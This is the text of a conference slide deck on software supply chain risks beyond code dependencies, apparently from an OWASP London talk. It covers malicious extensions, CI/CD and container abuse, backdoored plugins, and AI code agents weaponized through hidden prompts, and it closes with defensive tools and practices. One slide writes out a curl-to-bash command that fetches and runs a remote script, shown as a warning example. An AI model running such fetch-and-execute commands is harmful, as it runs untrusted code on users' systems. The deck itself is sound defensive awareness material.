You secured your code dependencies, is that enough?
Anant Shrivastava
A presentation at Owasp London in June 2025 in London, UK by Anant Shrivastava
Anant Shrivastava
● Chief researcher @ Cyfinoid Research (Research Powered Trainings) ● 17+ yrs of corporate exposure ● Speaker / Trainer: BH/DC, c0c0n, nullcon, RootConf, RuxCon ● Project Lead: ○ Code Vigilant (Code Review Project) ○ Hacking Archives of India, ○ TamerPlatform (Android Security)
(@anantshri on social platforms) https://anantshri.info
SOFTWARE SUPPLY CHAIN SECURITY SBOM (SOFTWARE BILL OF MATERIAL) SOURCE COMPOSITION ANALYSIS TOOLS
Incidences • SolarWind • CodeCov • Colonial Pipeline
Resultant • EO by US President
Ken Thompson talk about Supply Chain security and inherent trust in 1983. During the lecture, Ken outlines a three-step process for altering a C compiler binary to implant a backdoor when compiling the “login” program, all without leaving any evidence in the source code. He got the idea from an older US MIL document published in 1974 titled “MULTICS SECURITY EVALUATION”
Ref
● https://users.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf ● https://research.swtch.com/nih ● https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf
In a report by European Union Agency for Cyber Security (ENISA), they state Supply Chain Compromise of Software Dependencies as one of the threats that gonna be at peak.
Ref https://www.enisa.europa.eu/p ublications/enisa-foresightcybersecurity-threats-for-2030
https://ec.europa.eu/commission/presscorner/detail/en/ip_22_5374 https://www.japantimes.co.jp/news/2022/05/11/business/japan-passes-economic-security-bill-protect-sensitive-technology/ https://www.federalregister.gov/d/2021-10460/p-54 https://www.cert-in.org.in/PDF/SBOM_Guidelines.pdf
• Software build automation == quicker release cycle • Automated release cycle == less wait for features • Faster feature release == less inclination to upgrade dependencies • Too much focus on OSS Codebase without helping the maintainers • Impossible segregation of features and bug fixes • Automated notification of vulnerability (hedonic hamster wheel)
Start of Feb 2025 End of June 2025
2451693 issues closed 120751 new issues created
Itemized list of all the ingredients in the software Ingredients ~ thirdparty components SBoM’s are mostly for one level depth only with other levels plugged in each other.
https://www.ntia.gov/report/2021/minimum-elements-software-bill-materials-sbom
Generate or Consume SBoM Identify Outdated Software Insecure Software EOL Product And more
You have SCA tooling in your organization? You follow vulnerability management practices for source code components?
Let the fun begin © Cyfinoid Research 13
• We have focused too much on Software code itself • As consumers we are dealing with too many chain not in awareness • As a Company there are dependency chains far beyond code dependencies
Any Software or application which allows 3rd party to add or modify functionality
pluggable modules / plugins Extensions Theming customizations
A developer uses a Chrome extension to manipulate AI prompts, which are then fed into Visual Studio Code through a set of AI-driven code completion extensions. The resulting code is committed to GitHub, where a set of GitHub Actions automatically run analysis and tests. The code is then containerized into a Docker image, deployed on Kubernetes, running inside an EC2 instance, built from a specific AMI.
A developer uses an autonomous AI agent to write code by providing them a one liner prompt and full access to the commandline. The resulting code is committed to GitHub, where a set of GitHub Actions automatically run analysis and tests. The code is then containerized into a Docker image, deployed on Kubernetes, running inside an EC2 instance, built from a specific AMI.
PRODUCTION IS HARDENED, DEV NOT SO MUCH EASIER TO COMPROMISE LESS GUARDED PATHS SMALLER ORGS EASIER TO INFILTRATE / OCCUPY / ACQUIRE
Lots of credentials and access Developers require a bit of lax security to get job done Exceptions in network policy rules Mostly will have admin access Multiple powerful apps (IDE, debugger etc)
Content delivered differently to curl and browser
Don’t curl | sh
https://jordaneldredge.com/blog/one-way-curl-pipe-shinstall-scripts-can-be-dangerous/
Don’t pipe to shell
https://www.seancassidy.me/dont-pipe-to-yourshell.html
curl https://anantshri.info/fun/legitimate.sh | bash
• By Google (claimed as fastest) • Installer runs without admin privilege (you can cancel admin prompts)
• https://arstechnica.com/security/2025/01/dozens-ofbackdoored-chrome-extensions-discovered-on-2-6-milliondevices/
• https://gbhackers.com/malicious-editthiscookie-extension/
• Too many examples to count • https://www.bleepingcomputer.com/news/security/maliciousvscode-extensions-with-millions-of-installs-discovered/
• VS Code extensions marketplace is only usable by MS Products • https://open-vsx.org “Extensions for VS Code Compatible Editors” • Just over 8 million developers depend on Open VSX across dozens of VS Code based editors including Cursor, Windsurf, Google Cloud Shell Editor, and Gitlab Web IDE • Exploiting a CI issue a malicious actor could publish malicious updates to every extension on Open VSX
• Ref: https://blog.koi.security/marketplace-takeover-how-we-couldvetaken-over-every-developer-using-a-vscode-fork-f0f8cf104d44
• Google ads to bring traffic • Near replica of website • Serving install.sh with fake admin password prompt
https://x.com/ryanchenkie/status/1880730173634699393
https://manpages.debian.org/bookworm/apt/sources.list.5.en.html https://www.golinuxhub.com/2018/05/how-to-execute-script-at-pre-post-preun-postun-spec-file-rpm/
Git exploit when git clone —recursive-submodules
https://cybersecuritynews.com/hackers-hijacked-notepad-plugin/
• https://notepad-plus-plus.org/news/help-to-take-down-parasite-site/
• Remember those CTF’s where flag was hidden in whitespaces • Just that but dangerous
https://www.pillar.security/blog/new-vulnerability-in-github-copilot-and-cursor-how-hackers-canweaponize-code-agents
• Not just automation • Watch over the entire build or deployment practices • Essential Watchers in the current landscape
https://media.defense.gov/2023/Jun/28/2003249466/-1/-1/0/CSI_DEFENDING_CI_CD_ENVIRONMENTS.PDF
https://www.darkreading.com/vulnerabilities-threats/global-teamcity-exploitation-opens-door-to-solarwinds-style-nightmare
• Don’t install software • Download containers • Docker (ish) options needed
https://www.infosecurity-magazine.com/news/malicious-containers-found-docker/ https://blog.aquasec.com/supply-chain-threats-using-container-images
https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence
Package created with a good intent but later abused
Wordpress free plugin purchased and backdoored • https://www.bleepingcomputer.com/news/security/backdoorfound-in-wordpress-plugin-with-more-than-300-000installations/
• A - Awareness: Identify and move unknown risks into known risks. • T - Trust But Verify: Every dependency, tool, and service should be validated. • O - Ongoing Monitoring: Continuous security checks to detect changes & anomalies. • M - Measure & Map: Build capabilities to answer real questions (e.g., how many machines have Chrome installed? How many plugins exist in GitHub workflows?).
No matter how hard I try I will not be able to cover the full breadth
https://www.extensionauditor.com/
https://www.osquery.io/
Ref: https://medium.com/quiq-blog/detecting-high-risk-chrome-extensions-with-osquerybca1a8856448
Basic Common Sense ● Signed Commit ● Protected Branches ● Force reviews for pull request approval ● Force signed commits
Tooling ● https://github.com/Legit-Labs/legitify ● https://best.openssf.org/SCM-BestPractices/ ● Implement allstar to enforce secure baselines in the organization. ● https://docs.zizmor.sh
https://docs.safedep.io/
Overlay is a browser extension that helps developers evaluate open source packages before picking them. It gathers data from various sources, such as Snyk Advisor, Debricked, Socket.dev, and Deps.dev, and displays them on the package pages of popular registries like npm, PyPI, and Go.
Install - https://github.com/osscar/overlay#installation
Ref - https://checkmarx.com/blog/software-supply-chain-security-leaders-collaborate-and-build-browser-extension-to-help-developers-choose-open-source/
• ScoutSuite: https://github.com/nccgroup/ScoutSuite • Prowlet: https://github.com/prowler-cloud/prowler • Kube-hunter: https://github.com/aquasecurity/kube-hunter • Kube-bench: https://github.com/aquasecurity/kube-bench • KubiScan: https://github.com/cyberark/KubiScan • Kubeaudit: https://github.com/Shopify/kubeaudit • Trivy: https://github.com/aquasecurity/trivy • Cosign: Provenance : https://github.com/sigstore/cosign
https://github.com/SecureStackCo/visualizing-software-supply-chain?tab=readme-ov-file
https://slsa.dev/
• https://scvs.owasp.org/ • https://csrc.nist.gov/Projects/ssdf
https://pbom.dev/
SaaS
iOT
@anantshri
anant @ cyfinoid.com